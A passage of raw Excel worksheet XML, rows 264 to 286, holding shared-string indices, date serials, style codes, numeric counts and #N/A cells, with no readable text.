      </c>
      <c r="V264" s="83">
        <v>2</v>
      </c>
      <c r="W264" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="265" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A265" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B265" s="51">
        <v>44602.796026724536</v>
      </c>
      <c r="C265" s="1" t="s">
        <v>2785</v>
      </c>
      <c r="D265" s="43">
        <v>230</v>
      </c>
      <c r="E265" s="1" t="s">
        <v>2786</v>
      </c>
      <c r="F265" s="26">
        <v>243</v>
      </c>
      <c r="G265" s="1" t="s">
        <v>2782</v>
      </c>
      <c r="H265" s="1" t="s">
        <v>2788</v>
      </c>
      <c r="I265" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J265" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K265" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L265" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M265" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N265" s="1"/>
      <c r="O265" s="1"/>
      <c r="P265" s="1"/>
      <c r="Q265" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R265" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S265" s="83">
        <v>1</v>
      </c>
      <c r="T265" s="83">
        <v>1</v>
      </c>
      <c r="U265" s="83">
        <v>3</v>
      </c>
      <c r="V265" s="83">
        <v>2</v>
      </c>
      <c r="W265" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="266" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A266" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B266" s="51">
        <v>44602.796026666663</v>
      </c>
      <c r="C266" s="1" t="s">
        <v>2785</v>
      </c>
      <c r="D266" s="43">
        <v>110</v>
      </c>
      <c r="E266" s="1" t="s">
        <v>2789</v>
      </c>
      <c r="F266" s="26">
        <v>100</v>
      </c>
      <c r="G266" s="1" t="s">
        <v>2790</v>
      </c>
      <c r="H266" s="1" t="s">
        <v>2791</v>
      </c>
      <c r="I266" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J266" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K266" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L266" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M266" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N266" s="1"/>
      <c r="O266" s="1"/>
      <c r="P266" s="1"/>
      <c r="Q266" s="1" t="s">
        <v>3591</v>
      </c>
      <c r="R266" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S266" s="83">
        <v>125</v>
      </c>
      <c r="T266" s="83">
        <v>363</v>
      </c>
      <c r="U266" s="83">
        <v>350</v>
      </c>
      <c r="V266" s="83">
        <v>2534</v>
      </c>
      <c r="W266" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="267" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A267" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B267" s="51">
        <v>44312.610072337964</v>
      </c>
      <c r="C267" s="1" t="s">
        <v>2785</v>
      </c>
      <c r="D267" s="43">
        <v>230</v>
      </c>
      <c r="E267" s="1" t="s">
        <v>2789</v>
      </c>
      <c r="F267" s="26">
        <v>203</v>
      </c>
      <c r="G267" s="1" t="s">
        <v>2790</v>
      </c>
      <c r="H267" s="1" t="s">
        <v>2791</v>
      </c>
      <c r="I267" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J267" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K267" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L267" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M267" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N267" s="1"/>
      <c r="O267" s="1"/>
      <c r="P267" s="1"/>
      <c r="Q267" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R267" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S267" s="83">
        <v>125</v>
      </c>
      <c r="T267" s="83">
        <v>363</v>
      </c>
      <c r="U267" s="83">
        <v>350</v>
      </c>
      <c r="V267" s="83">
        <v>2534</v>
      </c>
      <c r="W267" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="268" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A268" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B268" s="51">
        <v>44602.796026597221</v>
      </c>
      <c r="C268" s="1" t="s">
        <v>2785</v>
      </c>
      <c r="D268" s="43">
        <v>110</v>
      </c>
      <c r="E268" s="1" t="s">
        <v>2794</v>
      </c>
      <c r="F268" s="26">
        <v>200</v>
      </c>
      <c r="G268" s="1" t="s">
        <v>2793</v>
      </c>
      <c r="H268" s="1" t="s">
        <v>2795</v>
      </c>
      <c r="I268" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J268" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K268" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L268" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M268" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N268" s="1"/>
      <c r="O268" s="1"/>
      <c r="P268" s="1"/>
      <c r="Q268" s="1" t="s">
        <v>3591</v>
      </c>
      <c r="R268" s="83">
        <v>10475</v>
      </c>
      <c r="S268" s="83">
        <v>10354</v>
      </c>
      <c r="T268" s="83">
        <v>10126</v>
      </c>
      <c r="U268" s="83">
        <v>12820</v>
      </c>
      <c r="V268" s="83">
        <v>11459</v>
      </c>
      <c r="W268" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="269" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A269" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B269" s="51">
        <v>44312.610072303243</v>
      </c>
      <c r="C269" s="1" t="s">
        <v>2785</v>
      </c>
      <c r="D269" s="43">
        <v>230</v>
      </c>
      <c r="E269" s="1" t="s">
        <v>2794</v>
      </c>
      <c r="F269" s="26">
        <v>214</v>
      </c>
      <c r="G269" s="1" t="s">
        <v>2793</v>
      </c>
      <c r="H269" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I269" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J269" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K269" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L269" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M269" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N269" s="1"/>
      <c r="O269" s="1"/>
      <c r="P269" s="1"/>
      <c r="Q269" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R269" s="83">
        <v>10475</v>
      </c>
      <c r="S269" s="83">
        <v>10354</v>
      </c>
      <c r="T269" s="83">
        <v>10126</v>
      </c>
      <c r="U269" s="83">
        <v>12820</v>
      </c>
      <c r="V269" s="83">
        <v>11459</v>
      </c>
      <c r="W269" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="270" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A270" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B270" s="51">
        <v>44602.79602671296</v>
      </c>
      <c r="C270" s="1" t="s">
        <v>2785</v>
      </c>
      <c r="D270" s="43">
        <v>230</v>
      </c>
      <c r="E270" s="1" t="s">
        <v>2799</v>
      </c>
      <c r="F270" s="26">
        <v>114</v>
      </c>
      <c r="G270" s="1" t="s">
        <v>2797</v>
      </c>
      <c r="H270" s="1" t="s">
        <v>2800</v>
      </c>
      <c r="I270" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J270" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K270" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L270" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M270" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N270" s="1"/>
      <c r="O270" s="1"/>
      <c r="P270" s="1"/>
      <c r="Q270" s="1" t="s">
        <v>3591</v>
      </c>
      <c r="R270" s="83">
        <v>118412</v>
      </c>
      <c r="S270" s="83">
        <v>101479</v>
      </c>
      <c r="T270" s="83">
        <v>96317</v>
      </c>
      <c r="U270" s="83">
        <v>118536</v>
      </c>
      <c r="V270" s="83">
        <v>109208</v>
      </c>
      <c r="W270" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="271" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A271" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B271" s="51">
        <v>44602.796026678239</v>
      </c>
      <c r="C271" s="1" t="s">
        <v>2785</v>
      </c>
      <c r="D271" s="43">
        <v>230</v>
      </c>
      <c r="E271" s="1" t="s">
        <v>2803</v>
      </c>
      <c r="F271" s="26">
        <v>114</v>
      </c>
      <c r="G271" s="1" t="s">
        <v>2802</v>
      </c>
      <c r="H271" s="1" t="s">
        <v>2804</v>
      </c>
      <c r="I271" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J271" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K271" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L271" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M271" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N271" s="1"/>
      <c r="O271" s="1"/>
      <c r="P271" s="1"/>
      <c r="Q271" s="1" t="s">
        <v>3591</v>
      </c>
      <c r="R271" s="83">
        <v>783386</v>
      </c>
      <c r="S271" s="83">
        <v>694063</v>
      </c>
      <c r="T271" s="83">
        <v>680729</v>
      </c>
      <c r="U271" s="83">
        <v>948563</v>
      </c>
      <c r="V271" s="83">
        <v>893550</v>
      </c>
      <c r="W271" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="272" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A272" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B272" s="51">
        <v>44602.796026701391</v>
      </c>
      <c r="C272" s="1" t="s">
        <v>2785</v>
      </c>
      <c r="D272" s="43">
        <v>230</v>
      </c>
      <c r="E272" s="1" t="s">
        <v>2808</v>
      </c>
      <c r="F272" s="26">
        <v>114</v>
      </c>
      <c r="G272" s="1" t="s">
        <v>2806</v>
      </c>
      <c r="H272" s="1" t="s">
        <v>2795</v>
      </c>
      <c r="I272" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J272" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K272" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L272" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M272" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N272" s="1"/>
      <c r="O272" s="1"/>
      <c r="P272" s="1"/>
      <c r="Q272" s="1" t="s">
        <v>3591</v>
      </c>
      <c r="R272" s="83">
        <v>239214</v>
      </c>
      <c r="S272" s="83">
        <v>214363</v>
      </c>
      <c r="T272" s="83">
        <v>207885</v>
      </c>
      <c r="U272" s="83">
        <v>251192</v>
      </c>
      <c r="V272" s="83">
        <v>235245</v>
      </c>
      <c r="W272" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="273" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A273" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B273" s="51">
        <v>44602.796026724536</v>
      </c>
      <c r="C273" s="1" t="s">
        <v>2785</v>
      </c>
      <c r="D273" s="43">
        <v>230</v>
      </c>
      <c r="E273" s="1" t="s">
        <v>2809</v>
      </c>
      <c r="F273" s="26">
        <v>103</v>
      </c>
      <c r="G273" s="57" t="s">
        <v>2810</v>
      </c>
      <c r="H273" s="1" t="s">
        <v>2811</v>
      </c>
      <c r="I273" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J273" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K273" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L273" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M273" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N273" s="1"/>
      <c r="O273" s="1"/>
      <c r="P273" s="1"/>
      <c r="Q273" s="1" t="s">
        <v>3591</v>
      </c>
      <c r="R273" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S273" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T273" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U273" s="83">
        <v>8</v>
      </c>
      <c r="V273" s="83">
        <v>954</v>
      </c>
      <c r="W273" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="274" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A274" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B274" s="51">
        <v>44602.796026608798</v>
      </c>
      <c r="C274" s="1" t="s">
        <v>2785</v>
      </c>
      <c r="D274" s="43">
        <v>110</v>
      </c>
      <c r="E274" s="1" t="s">
        <v>2815</v>
      </c>
      <c r="F274" s="26">
        <v>200</v>
      </c>
      <c r="G274" s="57" t="s">
        <v>2813</v>
      </c>
      <c r="H274" s="1" t="s">
        <v>2816</v>
      </c>
      <c r="I274" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J274" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K274" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L274" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M274" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N274" s="1"/>
      <c r="O274" s="1"/>
      <c r="P274" s="1"/>
      <c r="Q274" s="1" t="s">
        <v>3591</v>
      </c>
      <c r="R274" s="83">
        <v>550386</v>
      </c>
      <c r="S274" s="83">
        <v>481375</v>
      </c>
      <c r="T274" s="83">
        <v>456168</v>
      </c>
      <c r="U274" s="83">
        <v>552002</v>
      </c>
      <c r="V274" s="83">
        <v>548885</v>
      </c>
      <c r="W274" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="275" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A275" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B275" s="51">
        <v>44312.610072314812</v>
      </c>
      <c r="C275" s="1" t="s">
        <v>2785</v>
      </c>
      <c r="D275" s="43">
        <v>230</v>
      </c>
      <c r="E275" s="1" t="s">
        <v>2815</v>
      </c>
      <c r="F275" s="26">
        <v>214</v>
      </c>
      <c r="G275" s="57" t="s">
        <v>2813</v>
      </c>
      <c r="H275" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I275" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J275" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K275" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L275" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M275" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N275" s="1"/>
      <c r="O275" s="1"/>
      <c r="P275" s="1"/>
      <c r="Q275" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R275" s="83">
        <v>550386</v>
      </c>
      <c r="S275" s="83">
        <v>481375</v>
      </c>
      <c r="T275" s="83">
        <v>456168</v>
      </c>
      <c r="U275" s="83">
        <v>552002</v>
      </c>
      <c r="V275" s="83">
        <v>548885</v>
      </c>
      <c r="W275" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="276" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A276" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B276" s="51">
        <v>44481.587994861111</v>
      </c>
      <c r="C276" s="1" t="s">
        <v>2818</v>
      </c>
      <c r="D276" s="43">
        <v>100</v>
      </c>
      <c r="E276" s="1" t="s">
        <v>2819</v>
      </c>
      <c r="F276" s="26">
        <v>100</v>
      </c>
      <c r="G276" s="1" t="s">
        <v>2820</v>
      </c>
      <c r="H276" s="1" t="s">
        <v>2821</v>
      </c>
      <c r="I276" s="1" t="s">
        <v>528</v>
      </c>
      <c r="J276" s="1" t="s">
        <v>2501</v>
      </c>
      <c r="K276" s="1" t="s">
        <v>39</v>
      </c>
      <c r="L276" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M276" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N276" s="1"/>
      <c r="O276" s="1"/>
      <c r="P276" s="1"/>
      <c r="Q276" s="1" t="s">
        <v>2822</v>
      </c>
      <c r="R276" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S276" s="83">
        <v>385</v>
      </c>
      <c r="T276" s="83">
        <v>64217</v>
      </c>
      <c r="U276" s="83">
        <v>21887</v>
      </c>
      <c r="V276" s="83">
        <v>29389</v>
      </c>
      <c r="W276" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="277" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A277" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B277" s="51">
        <v>44610.697178946757</v>
      </c>
      <c r="C277" s="1" t="s">
        <v>2818</v>
      </c>
      <c r="D277" s="43">
        <v>110</v>
      </c>
      <c r="E277" s="1" t="s">
        <v>2819</v>
      </c>
      <c r="F277" s="26">
        <v>110</v>
      </c>
      <c r="G277" s="1" t="s">
        <v>2820</v>
      </c>
      <c r="H277" s="1" t="s">
        <v>2821</v>
      </c>
      <c r="I277" s="1" t="s">
        <v>528</v>
      </c>
      <c r="J277" s="1" t="s">
        <v>2501</v>
      </c>
      <c r="K277" s="1" t="s">
        <v>39</v>
      </c>
      <c r="L277" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M277" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N277" s="1"/>
      <c r="O277" s="1"/>
      <c r="P277" s="1"/>
      <c r="Q277" s="1" t="s">
        <v>2822</v>
      </c>
      <c r="R277" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S277" s="83">
        <v>385</v>
      </c>
      <c r="T277" s="83">
        <v>64217</v>
      </c>
      <c r="U277" s="83">
        <v>21887</v>
      </c>
      <c r="V277" s="83">
        <v>29389</v>
      </c>
      <c r="W277" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="278" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A278" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B278" s="51">
        <v>44579.730290960651</v>
      </c>
      <c r="C278" s="1" t="s">
        <v>2823</v>
      </c>
      <c r="D278" s="43">
        <v>141</v>
      </c>
      <c r="E278" s="1" t="s">
        <v>2824</v>
      </c>
      <c r="F278" s="43">
        <v>113</v>
      </c>
      <c r="G278" s="1" t="s">
        <v>2825</v>
      </c>
      <c r="H278" s="1" t="s">
        <v>2826</v>
      </c>
      <c r="I278" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J278" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K278" s="17" t="s">
        <v>15</v>
      </c>
      <c r="L278" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M278" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N278" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O278" s="1" t="s">
        <v>2827</v>
      </c>
      <c r="P278" s="1"/>
      <c r="Q278" s="1" t="s">
        <v>3592</v>
      </c>
      <c r="R278" s="83">
        <v>3210</v>
      </c>
      <c r="S278" s="83">
        <v>3236</v>
      </c>
      <c r="T278" s="83">
        <v>2718</v>
      </c>
      <c r="U278" s="83">
        <v>2532</v>
      </c>
      <c r="V278" s="83">
        <v>3876</v>
      </c>
      <c r="W278" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="279" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A279" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B279" s="51">
        <v>44579.73029097222</v>
      </c>
      <c r="C279" s="1" t="s">
        <v>2823</v>
      </c>
      <c r="D279" s="43">
        <v>141</v>
      </c>
      <c r="E279" s="1" t="s">
        <v>2829</v>
      </c>
      <c r="F279" s="43">
        <v>122</v>
      </c>
      <c r="G279" s="1" t="s">
        <v>2830</v>
      </c>
      <c r="H279" s="1" t="s">
        <v>2831</v>
      </c>
      <c r="I279" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J279" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K279" s="17" t="s">
        <v>15</v>
      </c>
      <c r="L279" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M279" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N279" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O279" s="1" t="s">
        <v>2832</v>
      </c>
      <c r="P279" s="1"/>
      <c r="Q279" s="1" t="s">
        <v>3592</v>
      </c>
      <c r="R279" s="83">
        <v>2978</v>
      </c>
      <c r="S279" s="83">
        <v>2782</v>
      </c>
      <c r="T279" s="83">
        <v>2424</v>
      </c>
      <c r="U279" s="83">
        <v>2131</v>
      </c>
      <c r="V279" s="83">
        <v>3483</v>
      </c>
      <c r="W279" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="280" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A280" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B280" s="51">
        <v>44579.730290844906</v>
      </c>
      <c r="C280" s="1" t="s">
        <v>2823</v>
      </c>
      <c r="D280" s="43">
        <v>141</v>
      </c>
      <c r="E280" s="1" t="s">
        <v>2833</v>
      </c>
      <c r="F280" s="43">
        <v>102</v>
      </c>
      <c r="G280" s="1" t="s">
        <v>2834</v>
      </c>
      <c r="H280" s="1" t="s">
        <v>2835</v>
      </c>
      <c r="I280" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J280" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K280" s="17" t="s">
        <v>15</v>
      </c>
      <c r="L280" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M280" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N280" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O280" s="1" t="s">
        <v>2836</v>
      </c>
      <c r="P280" s="1"/>
      <c r="Q280" s="1" t="s">
        <v>3592</v>
      </c>
      <c r="R280" s="83">
        <v>2979</v>
      </c>
      <c r="S280" s="83">
        <v>2785</v>
      </c>
      <c r="T280" s="83">
        <v>2309</v>
      </c>
      <c r="U280" s="83">
        <v>2117</v>
      </c>
      <c r="V280" s="83">
        <v>3438</v>
      </c>
      <c r="W280" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="281" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A281" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B281" s="51">
        <v>44579.730290995372</v>
      </c>
      <c r="C281" s="1" t="s">
        <v>2823</v>
      </c>
      <c r="D281" s="43">
        <v>141</v>
      </c>
      <c r="E281" s="1" t="s">
        <v>2837</v>
      </c>
      <c r="F281" s="43">
        <v>102</v>
      </c>
      <c r="G281" s="1" t="s">
        <v>2838</v>
      </c>
      <c r="H281" s="1" t="s">
        <v>2839</v>
      </c>
      <c r="I281" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J281" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K281" s="17" t="s">
        <v>15</v>
      </c>
      <c r="L281" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M281" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N281" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O281" s="1" t="s">
        <v>2840</v>
      </c>
      <c r="P281" s="1"/>
      <c r="Q281" s="1" t="s">
        <v>3592</v>
      </c>
      <c r="R281" s="83">
        <v>5</v>
      </c>
      <c r="S281" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T281" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U281" s="83">
        <v>5</v>
      </c>
      <c r="V281" s="83">
        <v>2</v>
      </c>
      <c r="W281" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="282" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A282" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B282" s="51">
        <v>44435.604508159726</v>
      </c>
      <c r="C282" s="1" t="s">
        <v>2841</v>
      </c>
      <c r="D282" s="43">
        <v>100</v>
      </c>
      <c r="E282" s="1" t="s">
        <v>2842</v>
      </c>
      <c r="F282" s="43">
        <v>100</v>
      </c>
      <c r="G282" s="1" t="s">
        <v>2843</v>
      </c>
      <c r="H282" s="1" t="s">
        <v>2844</v>
      </c>
      <c r="I282" s="1" t="s">
        <v>528</v>
      </c>
      <c r="J282" s="1" t="s">
        <v>2501</v>
      </c>
      <c r="K282" s="1" t="s">
        <v>39</v>
      </c>
      <c r="L282" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M282" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N282" s="1"/>
      <c r="O282" s="1"/>
      <c r="P282" s="1"/>
      <c r="Q282" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R282" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S282" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T282" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U282" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V282" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W282" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="283" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A283" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B283" s="51">
        <v>44292.098849571761</v>
      </c>
      <c r="C283" s="1" t="s">
        <v>1733</v>
      </c>
      <c r="D283" s="43">
        <v>105</v>
      </c>
      <c r="E283" s="1" t="s">
        <v>2848</v>
      </c>
      <c r="F283" s="26">
        <v>105</v>
      </c>
      <c r="G283" s="1" t="s">
        <v>2849</v>
      </c>
      <c r="H283" s="1" t="s">
        <v>2850</v>
      </c>
      <c r="I283" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J283" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K283" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L283" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M283" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N283" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O283" s="1"/>
      <c r="P283" s="1"/>
      <c r="Q283" s="1" t="s">
        <v>3562</v>
      </c>
      <c r="R283" s="83">
        <v>40933</v>
      </c>
      <c r="S283" s="83">
        <v>42088</v>
      </c>
      <c r="T283" s="83">
        <v>35909</v>
      </c>
      <c r="U283" s="83">
        <v>36716</v>
      </c>
      <c r="V283" s="83">
        <v>47279</v>
      </c>
      <c r="W283" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="284" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A284" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B284" s="51">
        <v>44523.723151099533</v>
      </c>
      <c r="C284" s="1" t="s">
        <v>2854</v>
      </c>
      <c r="D284" s="26">
        <v>100</v>
      </c>
      <c r="E284" s="1" t="s">
        <v>2855</v>
      </c>
      <c r="F284" s="26">
        <v>100</v>
      </c>
      <c r="G284" s="1" t="s">
        <v>2856</v>
      </c>
      <c r="H284" s="1" t="s">
        <v>2857</v>
      </c>
      <c r="I284" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J284" s="1" t="s">
        <v>542</v>
      </c>
      <c r="K284" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L284" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M284" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N284" s="1"/>
      <c r="O284" s="1"/>
      <c r="P284" s="1"/>
      <c r="Q284" t="s">
        <v>3593</v>
      </c>
      <c r="R284" s="87" t="e">
        <v>#N/A</v>
      </c>
      <c r="S284" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T284" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U284" s="87" t="e">
        <v>#N/A</v>
      </c>
      <c r="V284" s="87" t="e">
        <v>#N/A</v>
      </c>
      <c r="W284" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="285" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A285" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B285" s="51">
        <v>44523.723151087965</v>
      </c>
      <c r="C285" s="1" t="s">
        <v>2854</v>
      </c>
      <c r="D285" s="26">
        <v>100</v>
      </c>
      <c r="E285" s="1" t="s">
        <v>2859</v>
      </c>
      <c r="F285" s="26">
        <v>100</v>
      </c>
      <c r="G285" s="1" t="s">
        <v>2860</v>
      </c>
      <c r="H285" s="1" t="s">
        <v>2861</v>
      </c>
      <c r="I285" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J285" s="1" t="s">
        <v>542</v>
      </c>
      <c r="K285" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L285" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M285" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N285" s="1"/>
      <c r="O285" s="1"/>
      <c r="P285" s="1"/>
      <c r="Q285" s="1" t="s">
        <v>3593</v>
      </c>
      <c r="R285" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S285" s="83">
        <v>144</v>
      </c>
      <c r="T285" s="83">
        <v>5801</v>
      </c>
      <c r="U285" s="83">
        <v>61</v>
      </c>
      <c r="V285" s="83">
        <v>1456896</v>
      </c>
      <c r="W285" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="286" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A286" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B286" s="51">
        <v>44523.723151134262</v>
      </c>
      <c r="C286" s="1" t="s">
        <v>2854</v>
      </c>
      <c r="D286" s="26">
        <v>100</v>
      </c>
      <c r="E286" s="1" t="s">
        <v>2862</v>
      </c>
      <c r="F286" s="26">
        <v>100</v>
      </c>
      <c r="G286" s="1" t="s">
        <v>2863</v>
      </c>
      <c r="H286" s="1" t="s">
        <v>2864</v>
      </c>
